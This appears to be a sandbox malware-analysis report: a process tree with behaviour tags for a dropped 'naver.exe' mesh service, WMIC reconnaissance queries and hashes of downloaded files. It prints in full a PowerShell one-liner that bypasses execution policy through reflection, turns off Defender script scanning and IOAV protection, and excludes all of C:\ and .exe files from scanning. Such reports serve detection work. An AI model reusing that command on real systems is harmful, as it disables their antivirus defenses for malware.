C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
C:\Users\Admin\AppData\Local\naver\naver.exe"C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4336 -
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132 -
C:\Windows\system32\wbem\wmic.exewmic os get oslanguage /FORMAT:LIST2⤵PID:4808
-
C:\Windows\System32\wbem\wmic.exewmic SystemEnclosure get ChassisTypes2⤵PID:3240
-
C:\Windows\System32\wbem\wmic.exewmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"2⤵PID:1632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noprofile -nologo -command -2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2244
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b1e180583d3525f6534cc1110224a5fb
SHA1b7cadce5826cdbe5b7a16cc6116522e7885882b7
SHA2562e7e0e975fd986c9156ccaf646991dc1f1620e0330ff7b934dbdfd5a7c4567f7
SHA512a8b64bd8c0709ae0440846e98d9e8023506c5fc3228c5a4bb2a5ae29bc310fb7cf833219766a1305b708bd7f1b21d76b3efa1169d5c7ffa09412d2a4bb600752
-
Filesize
1KB
MD551c690a6fdcba7986fe86d1a9d29b24e
SHA14e0c6a52271253b9e1445173c72d28a0c6d3b667
SHA256b46eaa6f6f66c744a6baa471a8b37a4992e300b12ad51b234b812d453e3435ae
SHA512ef3c6840e09c92e44c09bc797d164e550ca2ea29170c5768ec0037eabf9fe693bc9a19aca911197acf4b75e1c13877923fb8010346d65b0857c0b61e85a4085b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.3MB
MD52bf9eaf0d2693850c39817b4b797cf43
SHA1e93f0ff794ab20bdda2f81d210f4869823455888
SHA256325502bedbb2a25218b2004535a679a8fe08daf44ad87ebe98db7dc4f3278026
SHA5122b7b6ca1bcffcb5a6007f938186dff14549bde8d8f5e61883525133a083d69812d28a1a41507a38d210283b4766b67442828259f45f7996f9e5beb4784f2166c
-
Filesize
22KB
MD52dd515ea546a81398d94dd15e3b4d55c
SHA1eb0b0fca721a296906166b7e972559b87353b726
SHA256becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2
SHA512439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb